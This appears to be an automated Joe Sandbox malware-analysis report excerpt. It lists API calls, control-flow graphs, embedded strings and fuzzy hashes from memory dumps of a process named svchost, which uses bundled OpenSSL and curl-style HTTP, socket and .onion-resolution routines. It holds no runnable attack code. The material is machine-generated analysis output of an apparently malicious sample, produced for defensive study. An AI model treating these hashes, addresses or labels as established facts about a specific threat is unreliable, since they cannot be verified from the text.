                                                                                                                                                                                • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FF8A9352E39), ref: 00007FF8A9331527
                                                                                                                                                                                • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FF8A9352E39), ref: 00007FF8A9331863
                                                                                                                                                                                • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FF8A9352E39), ref: 00007FF8A933187B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: R_new$R_set_debug
                                                                                                                                                                                • String ID: ossl_early_data_count_ok$ssl3_write_bytes$ssl\record\rec_layer_s3.c$tls_write_check_pending
                                                                                                                                                                                • API String ID: 476316267-2399994965
                                                                                                                                                                                • Opcode ID: f8178f680d83f3a347cd805ee141a041ec28e9a68a41335fa12e187e3285071d
                                                                                                                                                                                • Instruction ID: 01fb26ecc93c6b7e77a05f15c4af995ba6fd7297db91922b97b84a6e449dc913
                                                                                                                                                                                • Opcode Fuzzy Hash: f8178f680d83f3a347cd805ee141a041ec28e9a68a41335fa12e187e3285071d
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AE17F31A4EAC2A5EB609FA5D4807BA22B0EF45BD8F146539DE1DCB785DF3CE5818300

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1548 7ff8b83849e0-7ff8b8384a2c 1549 7ff8b8384a30-7ff8b8384a37 1548->1549 1549->1549 1550 7ff8b8384a39-7ff8b8384a45 1549->1550 1551 7ff8b8384a87-7ff8b8384aa3 1550->1551 1552 7ff8b8384a47-7ff8b8384a5d call 7ff8b83ae230 1550->1552 1553 7ff8b8384ab5-7ff8b8384aca call 7ff8b83850c0 1551->1553 1554 7ff8b8384aa5-7ff8b8384ab0 call 7ff8b83a7730 1551->1554 1560 7ff8b8384a5f-7ff8b8384a71 call 7ff8b83ae230 1552->1560 1561 7ff8b8384a73-7ff8b8384a82 call 7ff8b8374a70 1552->1561 1563 7ff8b8384acc-7ff8b8384ae5 call 7ff8b8374b60 1553->1563 1564 7ff8b8384ae9-7ff8b8384af0 1553->1564 1554->1553 1560->1551 1560->1561 1573 7ff8b8384f0c 1561->1573 1563->1564 1568 7ff8b8384aff-7ff8b8384b03 1564->1568 1569 7ff8b8384af2-7ff8b8384afa call 7ff8b83a7770 1564->1569 1571 7ff8b8384b09-7ff8b8384b13 1568->1571 1572 7ff8b8384f01-7ff8b8384f09 1568->1572 1569->1568 1576 7ff8b8384b49-7ff8b8384b5f inet_pton 1571->1576 1577 7ff8b8384b15-7ff8b8384b43 call 7ff8b8398350 * 2 1571->1577 1572->1573 1578 7ff8b8384f0f-7ff8b8384f35 call 7ff8b83c9e10 1573->1578 1580 7ff8b8384b67-7ff8b8384b7d inet_pton 1576->1580 1581 7ff8b8384b61-7ff8b8384b65 1576->1581 1577->1576 1596 7ff8b8384ede-7ff8b8384ee3 1577->1596 1585 7ff8b8384c0d-7ff8b8384c15 1580->1585 1586 7ff8b8384b83 1580->1586 1587 7ff8b8384b87-7ff8b8384b9a call 7ff8b83718a0 1581->1587 1588 7ff8b8384c17-7ff8b8384c25 1585->1588 1589 7ff8b8384c56-7ff8b8384c67 call 7ff8b83ae230 1585->1589 1586->1587 1587->1596 1600 7ff8b8384ba0-7ff8b8384ba8 1587->1600 1593 7ff8b8384c27-7ff8b8384c3c call 7ff8b83843b0 1588->1593 1594 7ff8b8384c42-7ff8b8384c50 1588->1594 1604 7ff8b8384c6d 1589->1604 1605 7ff8b8384cfb 1589->1605 1593->1594 1594->1589 1594->1596 1596->1578 1602 7ff8b8384bbd-7ff8b8384be4 call 7ff8b8383e50 1600->1602 1603 7ff8b8384baa-7ff8b8384bb8 call 7ff8b83a7730 1600->1603 1614 7ff8b8384bf7-7ff8b8384bfa 1602->1614 1615 7ff8b8384be6-7ff8b8384bf3 call 7ff8b83a7770 1602->1615 1603->1602 1610 7ff8b8384c74-7ff8b8384c7b 1604->1610 1609 7ff8b8384d02-7ff8b8384d0b 1605->1609 1609->1609 1613 7ff8b8384d0d-7ff8b8384d44 htons inet_pton 1609->1613 1610->1610 1612 7ff8b8384c7d-7ff8b8384c81 1610->1612 1618 7ff8b8384c83-7ff8b8384c9e call 7ff8b83ae2a0 1612->1618 1619 7ff8b8384ca0-7ff8b8384ca3 1612->1619 1616 7ff8b8384d4e-7ff8b8384d69 calloc 1613->1616 1617 7ff8b8384d46-7ff8b8384d49 1613->1617 1621 7ff8b8384ef3-7ff8b8384efc call 7ff8b83852d0 1614->1621 1622 7ff8b8384c00-7ff8b8384c08 call 7ff8b83716c0 1614->1622 1615->1614 1624 7ff8b8384d6b-7ff8b8384d6e 1616->1624 1625 7ff8b8384d73-7ff8b8384dac 1616->1625 1626 7ff8b8384e9a-7ff8b8384e9d 1617->1626 1618->1605 1618->1619 1627 7ff8b8384ccb-7ff8b8384cd8 call 7ff8b8385510 1619->1627 1628 7ff8b8384ca5-7ff8b8384cac 1619->1628 1621->1572 1622->1572 1624->1626 1635 7ff8b8384db0-7ff8b8384dbf 1625->1635 1626->1600 1632 7ff8b8384ea3-7ff8b8384ea6 1626->1632 1627->1596 1642 7ff8b8384cde-7ff8b8384ceb call 7ff8b8383e40 1627->1642 1628->1627 1636 7ff8b8384cae-7ff8b8384cc6 call 7ff8b83763d0 1628->1636 1632->1572 1638 7ff8b8384ea8-7ff8b8384eb9 1632->1638 1635->1635 1640 7ff8b8384dc1-7ff8b8384dc8 1635->1640 1636->1626 1643 7ff8b8384ebb-7ff8b8384ec0 call 7ff8b83766b0 1638->1643 1644 7ff8b8384ec2 call 7ff8b83625a0 1638->1644 1645 7ff8b8384dd0-7ff8b8384dd7 1640->1645 1653 7ff8b8384cf0-7ff8b8384cf6 1642->1653 1655 7ff8b8384ec7-7ff8b8384ed0 1643->1655 1644->1655 1645->1645 1647 7ff8b8384dd9-7ff8b8384dee calloc 1645->1647 1651 7ff8b8384e97 1647->1651 1652 7ff8b8384df4-7ff8b8384e77 htons inet_pton 1647->1652 1651->1626 1656 7ff8b8384e80-7ff8b8384e8f 1652->1656 1653->1626 1657 7ff8b8384eda-7ff8b8384edc 1655->1657 1658 7ff8b8384ed2-7ff8b8384ed5 call 7ff8b83852d0 1655->1658 1656->1656 1660 7ff8b8384e91-7ff8b8384e95 1656->1660 1657->1596 1659 7ff8b8384ee5-7ff8b8384ef1 1657->1659 1658->1657 1659->1572 1660->1626
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: inet_pton$SimpleString::operator=inet_ntop
                                                                                                                                                                                • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                                                                                                                                                                                • API String ID: 1960554822-2421204314
                                                                                                                                                                                • Opcode ID: 9ff23bee326df5bcc2ad56cce1fad22a70e61d3d6f94e34455db69677c3711d7
                                                                                                                                                                                • Instruction ID: edbebb810d446014b2a549698f28ea1a96d6d180de9a7b8c8691bd2bf8cbab50
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ff23bee326df5bcc2ad56cce1fad22a70e61d3d6f94e34455db69677c3711d7
                                                                                                                                                                                • Instruction Fuzzy Hash: 2BE18062B08B8286FB549F6995503BD27A1EB48BD8F488135CF1D07BD6EF7CE4568308

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1891 7ff8b83ab3f0-7ff8b83ab438 socket 1892 7ff8b83ab43a 1891->1892 1893 7ff8b83ab43f-7ff8b83ab4be htonl setsockopt 1891->1893 1894 7ff8b83ab6aa-7ff8b83ab6c1 call 7ff8b83c9e10 1892->1894 1895 7ff8b83ab661-7ff8b83ab67d closesocket * 3 1893->1895 1896 7ff8b83ab4c4-7ff8b83ab4da bind 1893->1896 1897 7ff8b83ab682-7ff8b83ab6a2 1895->1897 1896->1895 1899 7ff8b83ab4e0-7ff8b83ab4f4 getsockname 1896->1899 1897->1894 1899->1895 1901 7ff8b83ab4fa-7ff8b83ab4fe 1899->1901 1901->1895 1902 7ff8b83ab504-7ff8b83ab515 listen 1901->1902 1902->1895 1903 7ff8b83ab51b-7ff8b83ab532 socket 1902->1903 1903->1895 1904 7ff8b83ab538-7ff8b83ab54e connect 1903->1904 1904->1895 1905 7ff8b83ab554-7ff8b83ab563 call 7ff8b839c2d0 1904->1905 1905->1895 1908 7ff8b83ab569-7ff8b83ab59e call 7ff8b83a2110 accept 1905->1908 1908->1895 1911 7ff8b83ab5a4-7ff8b83ab5c9 call 7ff8b83b3b60 call 7ff8b839fe30 1908->1911 1911->1895 1916 7ff8b83ab5cf-7ff8b83ab5dc send 1911->1916 1917 7ff8b83ab5e2-7ff8b83ab61f call 7ff8b83a2110 recv 1916->1917 1920 7ff8b83ab6c2-7ff8b83ab6c5 1917->1920 1921 7ff8b83ab625-7ff8b83ab656 WSAGetLastError call 7ff8b83b3b60 call 7ff8b83b3bf0 1917->1921 1922 7ff8b83ab6c7-7ff8b83ab6ca 1920->1922 1923 7ff8b83ab6cf-7ff8b83ab6d7 1920->1923 1921->1895 1933 7ff8b83ab658-7ff8b83ab65f 1921->1933 1922->1917 1923->1895 1925 7ff8b83ab6d9-7ff8b83ab6e0 1923->1925 1925->1895 1927 7ff8b83ab6e6-7ff8b83ab6ea 1925->1927 1929 7ff8b83ab717-7ff8b83ab722 closesocket 1927->1929 1930 7ff8b83ab6ec-7ff8b83ab6fb call 7ff8b839c2d0 1927->1930 1929->1897 1930->1895 1935 7ff8b83ab701-7ff8b83ab711 call 7ff8b839c2d0 1930->1935 1933->1895 1933->1917 1935->1895 1935->1929
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: socket$acceptbindconnectgetsocknamehtonllistensendsetsockopt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3053784475-0
                                                                                                                                                                                • Opcode ID: d062e0d662efabfd737838c303d0ff00aeb29085ae0e7c2932690540158412af
                                                                                                                                                                                • Instruction ID: 43bbdeb8848ee4e94523558b89bdab24a78606aaace2a690a58bbf90e10dccc3
                                                                                                                                                                                • Opcode Fuzzy Hash: d062e0d662efabfd737838c303d0ff00aeb29085ae0e7c2932690540158412af
                                                                                                                                                                                • Instruction Fuzzy Hash: BE817E22B08A4185FB209B78D8147AD3365EB48BA8F584331DF6D46AE8DF7D954BC708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastO_test_flagsO_writeR_newR_set_debugR_vset_error
                                                                                                                                                                                • String ID: ssl\record\methods\tls_common.c$tls_retry_write_records$tls_write_records
                                                                                                                                                                                • API String ID: 1843479370-2458201149
                                                                                                                                                                                • Opcode ID: ede5e3c6ce354c2f49d1748be68e7db66be4a252287604ea360b831add1b72e9
                                                                                                                                                                                • Instruction ID: ca16b047310f82efcf94233767d3120c57582acac7eef111b360b0c7a5edbb9e
                                                                                                                                                                                • Opcode Fuzzy Hash: ede5e3c6ce354c2f49d1748be68e7db66be4a252287604ea360b831add1b72e9
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B719062B0EE85AAEB549F26D5423B923B5FB44BC8F142535CE1D83B95DF39E4A18300
                                                                                                                                                                                APIs
                                                                                                                                                                                • ERR_new.LIBCRYPTO-3-X64(00000000,00007FF8A92F3D8B,00000000,00007FF8A92DABE9,?,?,?,?,?,00007FF8A92DAB6E), ref: 00007FF8A92E2F7F
                                                                                                                                                                                • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FF8A92F3D8B,00000000,00007FF8A92DABE9,?,?,?,?,?,00007FF8A92DAB6E), ref: 00007FF8A92E2F97
                                                                                                                                                                                • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FF8A92F3D8B,00000000,00007FF8A92DABE9,?,?,?,?,?,00007FF8A92DAB6E), ref: 00007FF8A92E2FA8
                                                                                                                                                                                • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FF8A92F3D8B,00000000,00007FF8A92DABE9,?,?,?,?,?,00007FF8A92DAB6E), ref: 00007FF8A92E2FE7
                                                                                                                                                                                • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FF8A92F3D8B,00000000,00007FF8A92DABE9,?,?,?,?,?,00007FF8A92DAB6E), ref: 00007FF8A92E3012
                                                                                                                                                                                • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FF8A92F3D8B,00000000,00007FF8A92DABE9,?,?,?,?,?,00007FF8A92DAB6E), ref: 00007FF8A92E303B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: D_run_once$R_newR_set_debugR_set_error
                                                                                                                                                                                • String ID: OPENSSL_init_ssl$ssl\ssl_init.c
                                                                                                                                                                                • API String ID: 3879570137-538246785
                                                                                                                                                                                • Opcode ID: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                                                                                                                • Instruction ID: f42711c711d4bf6aadaca9ef26d24b89a6320411901ecb7e3ff9b05cf4ba8e43
                                                                                                                                                                                • Opcode Fuzzy Hash: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                                                                                                                • Instruction Fuzzy Hash: C5314361B0F98376FB549F59E8917B922B1EF943D0F483035D91EC2199EE3CE941C600
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                • Opcode ID: 6c2f63332866493af0b0a1bab1e895c36271426caa9fe52b6501e9839d70139d
                                                                                                                                                                                • Instruction ID: 9fa42f83c785b849217f6e825566d6abda81688a63e9226e005dc3b1c8a2ddf0
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c2f63332866493af0b0a1bab1e895c36271426caa9fe52b6501e9839d70139d
                                                                                                                                                                                • Instruction Fuzzy Hash: EFC1BD76B29A429AEB10CF78C4806AC3760FB89BD8F104225DF5E97794DF38E665D300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: O_free$O_mallocR_newR_set_debug
                                                                                                                                                                                • String ID: ssl\record\methods\tls_common.c$tls_setup_write_buffer
                                                                                                                                                                                • API String ID: 681801835-438346174
                                                                                                                                                                                • Opcode ID: 5d3dc832275a4da36f9814123598d6050a5a37ca2c5111cf277b49043ea628d5
                                                                                                                                                                                • Instruction ID: 8e0add395c11b029ea381beb467a9d71c1e049c961e4c1146e6cb1b5b572d3cf
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3dc832275a4da36f9814123598d6050a5a37ca2c5111cf277b49043ea628d5
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E51CF32F4EB91E6EB109F11E9403AA63B5FB44BC8F181135DE4E8BB84DE38E6558300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$CounterPerformanceQuery
                                                                                                                                                                                • String ID: Resolving timed out after %lld milliseconds
                                                                                                                                                                                • API String ID: 3490100708-1439975193
                                                                                                                                                                                • Opcode ID: 20c11ffeb193474a2878188bba0bc54bc4e083e1efe052222b4493c8b8a0414c
                                                                                                                                                                                • Instruction ID: 7dc5f4f5b26147b6e8e88240327408ec746a50563af616118d3651072da8fdae
                                                                                                                                                                                • Opcode Fuzzy Hash: 20c11ffeb193474a2878188bba0bc54bc4e083e1efe052222b4493c8b8a0414c
                                                                                                                                                                                • Instruction Fuzzy Hash: E3E19E61A08A8286EB509F2DD4112B963A0FF49BD8F4C5131DF4F4769ADF7DE886C308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: Resolving timed out after %lld milliseconds$operation aborted by pre-request callback
                                                                                                                                                                                • API String ID: 1294909896-247252918
                                                                                                                                                                                • Opcode ID: 196bb2bc9bc8b9530c5f5ac8ce52eba26a0aba2b3a2eb9ed960075ef3bb8d846
                                                                                                                                                                                • Instruction ID: 4bc1d7e72340396f37615308979c35328bcb057c93bcfdb5e7846fef4baf4ca1
                                                                                                                                                                                • Opcode Fuzzy Hash: 196bb2bc9bc8b9530c5f5ac8ce52eba26a0aba2b3a2eb9ed960075ef3bb8d846
                                                                                                                                                                                • Instruction Fuzzy Hash: 43D19B62A0868282EB649E2D84142BD27A1FF49BD8F0C5231CF4F476D9DF3CE846C308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s: %s, %02d %s %4d %02d:%02d:%02d GMT$%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Alt-Used$Alt-Used: %s:%d$Connection$Connection: %s%sTETE: gzip$Content-Range$Content-Range: bytes %s%lld/%lld$Content-Range: bytes %s/%lld$Content-Range: bytes 0-%lld/%lld$GET$HEAD$HTTP request too large$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified$Proxy-Connection$Proxy-Connection: Keep-Alive$Range$Range: bytes=%s$Referer$Referer: %s$User-Agent
                                                                                                                                                                                • API String ID: 1294909896-1770648156
                                                                                                                                                                                • Opcode ID: 3089a4fc1574ace82f836c30465ac50e35c4b44bbad1e323943524e626cf9d73
                                                                                                                                                                                • Instruction ID: 287d9f226ae02fb21762d50a01f13e949dbeef9c5fdc6884f1537df2a6c14fc8
                                                                                                                                                                                • Opcode Fuzzy Hash: 3089a4fc1574ace82f836c30465ac50e35c4b44bbad1e323943524e626cf9d73
                                                                                                                                                                                • Instruction Fuzzy Hash: DC528F61A08B8285FB65DB69D8443BD27A0AB48BC8F4C4035DF4E47796EF3CE586C748

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
